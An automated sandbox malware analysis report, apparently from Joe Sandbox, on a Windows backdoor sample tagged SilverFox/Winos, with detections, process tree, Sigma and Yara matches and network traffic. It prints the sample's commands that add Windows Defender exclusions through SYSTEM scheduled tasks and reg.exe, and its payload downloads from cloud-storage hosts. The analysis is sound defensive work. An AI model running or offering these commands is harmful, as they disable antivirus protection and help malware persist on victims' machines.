Edit tour

Windows Analysis Report
Gokod.763652.06.exe

Overview

General Information

Sample name:	Gokod.763652.06.exe
Analysis ID:	1639725
MD5:	815b9e41304ca2db2a1f89fbd68639a5
SHA1:	211508e3fccb4df2cdb01dc9d8b3dd743dfac826
SHA256:	bd2587248361ab3a0f069890945917ecb0b4775985c82fe18629c97d86096706
Tags:	backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Adds extensions / path to Windows Defender exclusion list (Registry)

Changes security center settings (notifications, updates, antivirus, firewall)

Drops PE files to the document folder of the user

Found direct / indirect Syscall (likely to bypass EDR)

Joe Sandbox ML detected suspicious sample

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to query CPU information (cpuid)

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains sections with non-standard names

Queries disk information (often used to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Sigma detected: Windows Defender Exclusions Added - Registry

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

Gokod.763652.06.exe (PID: 7784 cmdline: "C:\Users\user\Desktop\Gokod.763652.06.exe" MD5: 815B9E41304CA2DB2A1F89FBD68639A5)

svchost.exe (PID: 7912 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 8072 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 8092 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

SgrmBroker.exe (PID: 8188 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)

svchost.exe (PID: 7280 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.exe (PID: 7396 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

MpCmdRun.exe (PID: 4964 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)

conhost.exe (PID: 4956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

J8daaU.exe (PID: 6360 cmdline: C:\Users\user\Documents\J8daaU.exe MD5: DF76205EAF175184567FC44A83019B20)

J8daaU.exe (PID: 7992 cmdline: C:\Users\user\Documents\J8daaU.exe MD5: DF76205EAF175184567FC44A83019B20)

cmd.exe (PID: 7216 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4344 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1016 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3888 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 7876 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1876 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2768 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1076 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 3228 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1948 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1200 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4228 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 3892 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 2992 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3044 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4216 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 5044 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4332 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4356 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 4408 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

WerFault.exe (PID: 2692 cmdline: C:\Windows\system32\WerFault.exe -u -p 7992 -s 2280 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

cmd.exe (PID: 3984 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5668 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 5924 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 5644 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 2904 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 2236 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 3116 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 3340 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 4276 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 4520 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 5032 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

svchost.exe (PID: 4732 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

WerFault.exe (PID: 1080 cmdline: C:\Windows\system32\WerFault.exe -pss -s 448 -p 7992 -ip 7992 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)

J8daaU.exe (PID: 4056 cmdline: C:\Users\user\Documents\J8daaU.exe MD5: DF76205EAF175184567FC44A83019B20)

cleanup

Yara Signatures

Unpacked PEs

Source	Rule	Description	Author	Strings
8.2.J8daaU.exe.1811f7d0000.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x213df:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x21492:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x214f0:$e2: Add-MpPreference -ExclusionPath
55.2.J8daaU.exe.2b875810000.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x213df:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x21492:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x214f0:$e2: Add-MpPreference -ExclusionPath

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\J8daaU.exe, ParentImage: C:\Users\user\Documents\J8daaU.exe, ParentProcessId: 7992, ParentProcessName: J8daaU.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 7216, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Source: Process started

Author: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3984, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f, ProcessId: 5924, ProcessName: reg.exe

Sigma detected: Windows Defender Exclusions Added - Registry

Source: Registry Key set

Author: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 5924, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\user\Documents

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 632, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7912, ProcessName: svchost.exe

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: Gokod.763652.06.exe	Virustotal: Detection: 16%			Perma Link
Source: Gokod.763652.06.exe	ReversingLabs: Detection: 16%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown	HTTPS traffic detected: 39.103.20.59:443 -> 192.168.2.4:49724 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.98:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.98:443 -> 192.168.2.4:49742 version: TLS 1.2

Source:	Binary string: C:\CodeBases\isdev\redist\language independent\x64\SetupSuite64.pdb source: Gokod.763652.06.exe
Source:	Binary string: C:\new-builder\SAC-10.9-dev\master\SAC\Solutions\x64\Release\ManageReaders.pdb source: J8daaU.exe, 00000008.00000002.1541949190.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe, 00000008.00000000.1527093516.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe, 00000009.00000000.1637253845.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe, 00000037.00000000.2227008485.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe, 00000037.00000002.2417861079.00007FF6FCAF1000.00000002.00000001.01000000.0000000A.sdmp, J8daaU.exe.0.dr
Source:	Binary string: C:\Users\qt\work\qt\qtvirtualkeyboard\plugins\virtualkeyboard\qtvirtualkeyboard_openwnn.pdb<< source: Gokod.763652.06.exe
Source:	Binary string: F:\4.7.471.07\Sources\_bin\32\Release\PhilipsSpeechDriverConfiguration.pdb source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.dr
Source:	Binary string: D:\dev\navicatlibs\windows\x64\Release\libqb.pdb source: Gokod.763652.06.exe
Source:	Binary string: C:\Users\qt\work\qt\qtquickcontrols2\lib\Qt5QuickTemplates2.pdb source: Gokod.763652.06.exe
Source:	Binary string: D:\dev\navicatlibs\windows\x64\Release\libqb.pdbII(!GCTL source: Gokod.763652.06.exe
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: aceprocted.sys.0.dr
Source:	Binary string: C:\Users\qt\work\qt\qtvirtualkeyboard\plugins\virtualkeyboard\qtvirtualkeyboard_openwnn.pdb source: Gokod.763652.06.exe

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramData	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)	Jump to behavior

Source: C:\Users\user\Documents\J8daaU.exe	Code function: 8_2_00007FF6FCAE9AE0 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,		8_2_00007FF6FCAE9AE0
Source: C:\Users\user\Documents\J8daaU.exe	Code function: 55_2_00007FF6FCAE9AE0 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,		55_2_00007FF6FCAE9AE0

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Documents\J8daaU.exe

Code function: 55_2_000002B873646BE5 InternetOpenUrlA,InternetReadFile,

55_2_000002B873646BE5

Source: global traffic	HTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: 3MHost: xh4ffp.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: 3MHost: xh4ffp.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /b.gif HTTP/1.1User-Agent: 3MHost: xh4ffp.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /c.gif HTTP/1.1User-Agent: 3MHost: xh4ffp.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /d.gif HTTP/1.1User-Agent: 3MHost: xh4ffp.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.dat HTTP/1.1User-Agent: 3MHost: xh4ffp.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /s.jpg HTTP/1.1User-Agent: 3MHost: xh4ffp.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: nm25.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: nm25.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: nm25.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-51.jpg HTTP/1.1User-Agent: GetDataHost: nm25.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /drops.jpg HTTP/1.1User-Agent: GetDataHost: nm25.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /f.dat HTTP/1.1User-Agent: GetDataHost: nm25.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /FOM-50.jpg HTTP/1.1User-Agent: GetDataHost: nm25.oss-cn-hangzhou.aliyuncs.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: xh4ffp.oss-cn-beijing.aliyuncs.com
Source: global traffic	DNS traffic detected: DNS query: nm25.oss-cn-hangzhou.aliyuncs.com

Source: Gokod.763652.06.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: Gokod.763652.06.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: aceprocted.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: Gokod.763652.06.exe, aceprocted.sys.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: Gokod.763652.06.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: Gokod.763652.06.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.dr, J8daaU.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.dr, J8daaU.exe.0.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Gokod.763652.06.exe	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Gokod.763652.06.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: Gokod.763652.06.exe	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: Gokod.763652.06.exe, J8daaU.exe.0.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: aceprocted.sys.0.dr	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: svchost.exe, 00000001.00000002.2416629749.000001F385400000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.ver)
Source: J8daaU.exe, 00000009.00000003.1879353261.000001F5AA04E000.00000004.00000020.00020000.00000000.sdmp, J8daaU.exe, 00000037.00000002.2417698713.000002B8761F0000.00000004.00000020.00020000.00000000.sdmp, 4xCNoe.exe.9.dr, u0syUl.exe.55.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: Gokod.763652.06.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: Gokod.763652.06.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
